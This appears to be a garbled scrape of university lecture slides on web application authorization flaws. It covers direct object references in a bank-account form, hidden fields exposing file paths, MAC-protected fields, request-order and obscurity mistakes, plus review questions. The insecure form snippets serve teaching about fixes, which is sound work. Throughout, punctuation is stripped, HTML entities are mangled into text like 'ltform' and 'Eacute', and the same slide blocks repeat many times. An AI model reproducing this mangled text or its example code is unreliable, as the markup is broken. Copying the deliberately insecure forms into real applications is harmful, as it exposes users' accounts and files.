Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
top related